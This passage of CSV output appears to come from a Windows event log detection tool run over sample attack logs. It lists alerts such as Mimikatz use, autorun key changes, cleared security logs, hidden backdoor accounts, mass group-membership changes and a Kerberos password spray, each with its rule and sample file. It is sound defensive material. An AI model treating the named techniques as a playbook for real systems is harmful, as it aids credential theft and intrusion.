Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:37.672 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:58.942 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-10 19:20:58.942 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx +2020-07-11 22:21:11.693 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:11.693 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:17.514 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:17.514 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:18.640 +09:00,wec02,70,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-11 22:21:18.640 +09:00,wec02,70,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx +2020-07-12 02:16:42.576 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx +2020-07-12 02:16:42.592 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral 
Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx +2020-07-12 02:16:50.984 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx +2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx +2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx +2020-07-12 02:18:01.228 +09:00,fs02.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx +2020-07-12 06:38:17.351 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:1 TaskName:\\smbservice 
timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- +2020-07-12 06:38:17.445 +09:00,fs02.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx +2020-07-12 06:49:56.318 +09:00,fs02.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx +2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,medium,Local user account created,User: admin-kriss : SID:S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-4726 Fast created-deleted user.evtx +2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,medium,Local user account created,User: admin-kriss : SID:S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Admin like user created.evtx +2020-07-12 14:12:58.295 +09:00,jump01.offsec.lan,4720,medium,Local user account created,User: hacking-local-acct : SID:S-1-5-21-1470532092-3758209836-3742276719-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Local user created.evtx +2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,User added to local Administrators group,User: - : SID: 
S-1-5-21-1470532092-3758209836-3742276719-1001 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-User added to local admin groups.evtx +2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-1470532092-3758209836-3742276719-1001 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-4733-Quick added-removed user from local group.evtx +2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=lambda-user,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1158 : Group: Group02",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx +2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=lambda-user,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1158 : Group: Group02 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx +2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: 
S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group01",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group01 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group02",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group02 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: 
CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group03",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group03 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group04",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group04 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.570 
+09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group05",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group05 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group06",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group06 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive 
account group membership change.evtx +2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group07",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group07 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group08",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group08 : Subject user: lambda-user : Subject domain: 
OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group09",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group09 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group10",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : 
Group: Group10 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group11",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group11 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx +2020-07-12 14:27:05.579 +09:00,fs02.offsec.lan,4825,medium,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx +2020-07-12 14:28:26.831 +09:00,fs02.offsec.lan,4825,medium,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx +2020-07-12 15:01:13.758 
+09:00,rootdc1.offsec.lan,4728,high,User added to local Domain Admins group,"User: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalDomainAdminsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx +2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,User added to the global Domain Admins group,"Member added: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalDomainAdmins.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx +2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx +2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Hidden user account created! 
(Possible Backdoor),User: FAKE-COMPUTER$ : SID:S-1-5-21-4230534742-2542757381-3142984815-1168,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx +2020-07-13 17:34:33.915 +09:00,rootdc1.offsec.lan,4794,high,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4794-4688-DSRM password set with NTDSutil.evtx +2020-07-19 22:06:52.199 +09:00,01566s-win16-ir.threebeesco.com,5145,critical,Protected Storage Service Access,,rules/sigma/builtin/security/win_protected_storage_service_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_protectedstorage_5145_rpc_masterkey.evtx +2020-07-23 05:29:27.321 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: HD01 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: admin : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: svc-02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: HD02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: svc-01 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: bob : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: admin02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx +2020-07-23 05:29:36.434 
